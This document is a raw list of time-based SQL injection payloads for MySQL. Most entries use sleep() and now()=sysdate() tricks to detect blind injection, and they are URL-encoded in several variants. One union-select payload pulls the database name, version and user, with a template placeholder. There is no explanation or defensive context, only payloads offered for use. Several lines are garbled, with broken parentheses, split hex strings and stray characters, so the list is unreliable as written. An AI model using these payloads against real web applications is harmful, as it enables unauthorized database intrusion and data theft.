Sqli payloads - time based 

0 ' XOR(if (now()=sysdate(), sleep(5),0))XOR' Z
0' XOR(if(now()=sysdate(), sleep (5*1),0) )XOR'Z
if(now=sysdate),sleep(5),0)
' XOR(if(now()=sysdate(), sleep(5), 0))XOR*
' XOR(if(now()=sysdate(), sleep (5*1),0) )OR'
if(now(=sysdate(),sleep(5), 0)/"XOR(if(now()=sysdate(), sleep(5), 0))OR" /
if(now=sysdate(,sleep(5),0)/*'XOR(if(now()=sysdate(), sleep(5),0))OR' "XO
Rif(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(), sleep(5), 0)/'XOR(if(now()=sysdate(), sleep(5), 0))OR' "XOR
(if(now()=sysdate(), sleep(5),0) and 5=5)" /
SLEEP(5)/*' or SLEEP(5) or •" or SLEEP(5) or "*/ %2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)) )a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5) ))a)%2b'
, (select * from (select(sleep(5)))a) desc%2c(select*from(select(sleep(5)))a)
 1+or+1%3d( (SELECT+1+FROM+(SELECT+SLEEP(5))A))
 1+or+1=(SELECT+1+FROM+(SELECT+SLEEP(5) )A))
(SELECT * FROM (SELECT(SLEEP(5)) )YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)# (SELECT * FROM (SELECT(SLEEP(5)) )YYYY) -
'+(select*from(select(sleep(5)))a)+'
(select (0)from(select(sleep(5)))v)%2f'+
(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+
(select(0)from(select(sleep(5)))v)+'"+
(select (0) from(select(sleep(5)))v)+"*%2f
(select (0)from(select(sleep(5)))v)/*'+
(select(0)from(select(sleep(5)))v)+'"+
(select(0) from(select(sleep(5)))v)+"*/
',''),/*test*/%26%26%095LeEp (5)%09 -*


Payload: '+union all select
concat(0x64617461626173653a, 1,0x7c76657273696f6e3a,2,0x7 c757365723a, md5({{num}})), 2,3,4,5,6,7,8-- -


(select*from(select(sleep(15)))a)